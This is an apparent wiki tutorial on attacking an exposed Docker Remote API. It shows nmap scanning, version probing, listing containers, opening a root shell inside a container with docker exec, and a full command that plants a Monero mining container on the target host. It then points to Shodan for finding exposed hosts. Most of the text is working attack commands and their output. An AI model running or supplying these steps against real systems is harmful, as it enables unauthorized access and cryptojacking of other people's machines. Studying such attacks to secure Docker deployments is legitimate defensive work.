Docker - Security - Attack Docker exposed API

If you have enabled Docker Remote API, per Enable Docker Remote API, you may be vulnerable to attacks.

Information Gathering & Enumeration

Do a port scan

sudo nmap -sS -T5 192.168.1.118 -p-Starting Nmap 7.01 ( https://nmap.org ) at 2017-04-11 12:37 CEST
Nmap scan report for 192.168.1.118
Host is up (0.00076s latency).
Not shown: 65498 closed ports, 35 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
1234/tcp open  docker
MAC Address: 0C:01:67:8A:63:F2 (Oracle VirtualBox virtual NIC)

I had to scan more ports that the default top 1000 because the docker API port is not included :( Ok then, what about service detection?

nmap -sTV -p 1234 192.168.1.118
 
Starting Nmap 7.01 ( https://nmap.org ) at 2017-04-11 12:43 CEST
Nmap scan report for 192.168.1.118
Host is up (0.00038s latency).
PORT     STATE SERVICE    VERSION
1234/tcp open  18.06.0-ce Docker
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.65 seconds

This confirm that we are dealing with Docker.

nmap also discovered the exact version of Docker. If we want to confirm it manually we can issue a GET request to the endpoint located at: http://<IP>:1234/version.

curl -s http://192.168.1.118:1234/version | python -m json.tool

NOTE: Claudio Criscione wrote a nmap script to do this (His GitHub page).

Test the exposed API using the docker CLI

docker -H 192.168.1.118:1234 info

Gather Information

Are there some containers running?

docker -H 192.168.1.118:1234 ps

Are there some stopped containers?

docker -H 192.168.1.118:1234 ps -a

What are the images pulled on the host machine?

docker -H 192.168.1.118:1234 images

Accessing the container

Spawn a bash shell:

docker -H 192.168.1.118:1234 exec -it <container name> /bin/bash

Check ownership:

whoami && id
root
uid=0(root) gid=0(root) groups=0(root)

NOTE: Already root!!!

The default user inside a container is root.

Once inside a container you can start digging for some useful information.

Launching other containers

A funny thing that you can do is launch other containers, this is not very stealthy but can be useful.

Following the crypto-mining trend, this blog post explains how to mine monero with docker:

https://getmonero.org/resources/user-guides/mining_with_xmrig_and_docker.html

You can have a look inside the Dockerfile at this link from DockerHub.

Easily you could launch a mining container with the following command:

docker -H 192.168.1.118:1234 run --restart unless-stopped --read-only -m 50M -c 512 bitnn/alpine-xmrig -o POOL01 -o POOL02 -u WALLET -p PASSWORD -k

Find exposed Docker API

https://www.shodan.io/
- Search for: Product:“Docker”

Wiki

Table of Contents